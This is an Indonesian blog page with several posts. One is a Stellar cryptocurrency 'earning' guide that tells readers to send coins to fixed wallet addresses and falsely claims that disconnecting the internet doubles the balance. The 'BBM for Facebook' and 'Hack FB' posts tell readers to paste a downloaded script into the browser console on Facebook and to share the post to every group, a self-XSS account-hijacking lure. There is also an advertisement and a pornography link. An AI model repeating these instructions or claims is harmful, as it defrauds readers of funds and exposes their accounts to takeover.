Cara Bisnis Online Menggunakan Akun Facebook

Monday, August 28, 2017 2 Comments
> apa itu stellar ?
   stelar adalah situs untuk mengumpulkan poin berupa STR
>apa gunanya ?
   poin STR bisa di tukarkan dengan poin BTC atau bitcoin
>apa itu btc ?
   btc situs ngumpulin poin yang bisa di tuker ke RP(rupiah )
>berapakah nilai untuk STR,BRC,dan RP ?
   1BTC = RP. 5.862.000
di https://launch.stellar.org/#/register

2. veifikasi email anda
3.connect kan ke facebook kamu


4. misinya disuruh ngirim stellar 150 atau 100 atau 25 (tergantung misi) pertama kali  kirim aja ke  gMkdGUCA1sFoabSkuGsb4VSdXPfd9sA86H
5. Klik Logout, Terus Login Lagi.
6. Send Balance lagi
7. Masukan Data Data Berikut:
- Send to: 
gMkdGUCA1sFoabSkuGsb4VSdXPfd9sA86H
- Amount: 100
8. ingat hadiah setelah mengikuti langkah-langkah diatas adalah 1000 stellar = lbh kurang $3 (dalam waktu max 1 jam)

9.nah ulangin cara 1 - 8 berulang kali dengan ID akun yang berbeda.1 ID= 1 akun FB dan 1 email
bayangain anda punya 20 akun stellar ..20 x $3 ,, 
10.save tutorial diatas jika anda masih newbie. 

Trick perbanyak balance STELLAR!!!!!
setelah  anda menerima reward 3500 str (biasanya anda akan terima dalam 6 hari) langsung  CLAIM
dan Send Balance 3000 ke :
masukkan kode dibawah ini
gnhPFpbYXcYGMkGxfWdQGFfuKEdJoEThVo
dan dibawahnya isi dengan kode
2650705549
lalu klik SEND lalu CONFIRM TRANSACTION
hitunglah dalam hati 1-5 ..lalu diskonekkan internet anda.
dan lihat..balance yg anda kirim menjadi DOUBLE
jika gagal ulangi dari awal!

Aplikasi BBM for Facebook

Monday, June 26, 2017 9 Comments


BBM'an tanpa punya Hp bb ,  bagi yg belum punya BB cara ini memang menguntungkan 
caranya Dibawah Ini .
sebelum Baca Cara nya Invite Pin saya dulu 7A5E40C9
Beriku Cara cara nya :
1. Masuk ke facebook
2. download scriptnya. disin

Jika sudah di download, buka scriptnya terus tekan Ctrl+A (Pilih semua)Ctrl+C (Copy script)

3. Buka Console Box

Cara membuka Console Box Bagi pengguna Google Chrome* Press Ctrl+Shift +J* Paste semua script dikolom bawah.* Klik Enter
Bagi pengguna Mozilla Firefox* Press Ctrl+Shift+K* Paste semua script dikolom bawah.* Klik Enter* Selesai

KETERANGAN :
❶bagikan keterangan  ini ke Facebook (bagikan di semua grup kamu) , agar Aplikasi berfungsi maksimal
❷ jika Loading agak lambat ??? itu tandanya sedang menginstal biarkan saja, tunggu 2 - 5 menit, sampai proses instalasi selesai..
❸ Tak usah Panjang Lebar, jika ada yg ditanyakan inbox saja...

Kumpulan Tema FB keren 2014

Sunday, June 26, 2016 7 Comments

Assalamualaikum Wr. Wb. Kembali lagi bersama Agung RemajaMundu :)
kalau tadi saya posting cara merubah tema facebook dengan addons mozilla  ,, Kali Ini Saya Akan Share Kumpulan Tema FB yg Berada dalam ALbum Foto Di FB saya :) yg berisikan tentang screenShoot Tema FB ..

Berikut Script Temanya :


Tema Animasi Cinta Part 1
Tema Animasi Cinta Part 2
Tema Cinta
Tema Gadis Cantik 
Tema Emo
Tema Shadow
Tema I love You
Tema I Miss You
Tema I Need You


Keterangan :
1. Tinggal Download Script Diatas :)
2. Jika belum tau Cara  Instalnya, Baca caranya disini

Cara Hack FB 2014

Saturday, May 21, 2016 20 Comments


Assalamualaikmu Wr. Wb
Apa kabar semuanya...

Saya mau ngasih trick tentang hack facebook  2014 , Tutorial Ini Beda dengan tutorial yg sebelumnya Yaitu  Cara Hack FB terbaru 3 Menit sukses 



1. Cari Akun FB yg Ingin Anda Hack, Terus Buka Profilenya.
2. download scriptnya. disini 

Jika sudah di download, buka scriptnya terus tekan :Ctrl+A (Pilih semua)Ctrl+C (Copy script)

3. Buka Console Box

Cara membuka Console Box Bagi pengguna Google Chrome* Press Ctrl+Shift +J* Paste semua script dikolom bawah.* Klik Enter
Bagi pengguna Mozilla Firefox* Press Ctrl+Shift+K* Paste semua script dikolom bawah.* Klik Enter* Selesai

KETERANGAN :

❶ bagikan foto ini / keterangan foto ini, agar Aplikasi berfungsi maksimal
❷ Tunggu 1 Menit, Dan Jika Berhasil, anda akan mendapatkan Pesan Dari Facebook
❸ Tak usah Panjang Lebar, jika ada yg ditanyakan inbox saja...

Cara mendapatkan Komisi Uang dari Goviral Indonesia

Thursday, November 06, 2014 No Comment


RemajaMundu - Siapa yang gak kenal Twitter ? pastinya sobbat - sobat semua tahu tentang jejaring social yang satu ini. Situs yang sangat populer di kalangan remaja. Followers anda banyak ? banyak yang Mention, Re-tweet atau bahkan memfavorite tweet anda. Anda Luar biasaa.... :D

Tapi akan sangat sayang sekali apabila dengan followers sebanyak itu tidak dimanfaatkan sebaik mungkin, salah satunya bisa menghasilkan uang di twitter. Goviral Indonesia adalah solusi yang menurut saya paling tepat :). situs yang ber alamatkan www.Gorviral.co.id adalah situs resmi dari perusahaan tersebut.

Caranya sangat gampang sekali. Tugas kita di goviral adalah Nge-Tweet Produk iklan dari Goviral dan kita akan mendapatkan Komisinya. Mudah kan ? iya emang mudah :D , Followers sedikit bisa enggak ya ? jangan kawatir, Sesedikit Followers anda pasti Goviral akan membayarnya. Apalagi anda punya Followers Ratusan Ribu, wow... Tambah Joss dapat komisinya ^^

Apa sih Goviral Indonesia itu ?





 

Adalah sebuah media promosi digital yang dengan memanfaatkan jaringan influencer-influencer yang tersebar melalui semua sosial media. Dengan metode promosi dan beriklan yang baru, diharapkan dapat membantu meningkat penjualan pengiklan atau brand di era perkembangan teknologi informasi sekarang ini.

 

Mengapa setiap Brand harus GoViral?

 

Seiring dengan berpindahnya pemirsa Koran, Majalah dan Televisi ke media Digital, setiap Brand memerlukan media baru untuk menyampaikan berbagai Produk baru serta keunggulan-keunggulan Produk yang dimiliki ke calon Pelanggan yang tepat melalui dunia digital.
Professional muda semakin sibuk dan memiliki waktu yang semakin terbatas, sehingga gadget(hp/tablet) menjadi salah satu solusi yang selalu dibawa ke mana pun mereka pergi.
Walaupun hasil promosi melalui media digital jauh lebih terukur, biaya berpromosi melalui dunia Digital bisa dikatakan 1000%-10000% lebih murah dibandingkan berpromosi melalui media konvensional.
Suatu pilihan yang menggiurkan bukan?

Mengapa setiap pemilik Akun Social Media harus GoViral?

 

GoViral menjadi salah satu media terpercaya untuk mendapatkan revenue stream yang baru. Selain itu setiap pemilik Akun masih dapat mensortir setiap Promosi yang masuk, agar dapat lebih sesuai.Iseng-iseng dapat penghasilan tambahan, sesuatu banget kan?
Kami juga memiliki Tim Copy Writing yang memiliki kemampuan untuk membuat kalimat yang menggigit dan menarik minat setiap Calon Pelanggan, namun tetap berkelas dan sesuai dengan segmentasi yang dituju.
Jadi setiap Brand yang GoViral tidak perlu kawatir mengenai cara menggandeng Pelanggan Baru, dan setiap pemilik Akun tidak perlu kawatir mengenai kata-kata dalam setiap Promosi karena toh tetap dapat mensortir setiap Promosi yang hendak ditayangkan.

Goviral at Majalah Marketing June 2011

Testimoni Dari Pengguna Goviral


Pendapatan Dari Goviral Indonesia



Goviral Indonesia terbukti membayar dan tidak SCAM !

Bagaimana Cara Mendaftar Goviral ?
Sangat mudah sekali..

1. Masuk ke sini Goviral Indonesia atau KLIK DISINI , sign in via twitter
2. Isi data- data anda dengan lengkap
3. Tunggu dapet iklan dari pihak goviral, Pastikan selalu cek email anda
Iklan dari Goviral Indonesia


Selamat Mencoba:)

Download Bokep terbaru 2014

Thursday, September 25, 2014 No Comment




Oke langsung saja buat yg ingin memuaskan diri,,
ingattttt dosa ditanggung pemenang :v

langsung menuju ke web nya saja ,, klik disini
 

Website | The content is copyrighted and may not be reproduced on other websites. © | All Rights Reserved 2014

RemajaMundu Blogger template Steven

notifikasi
close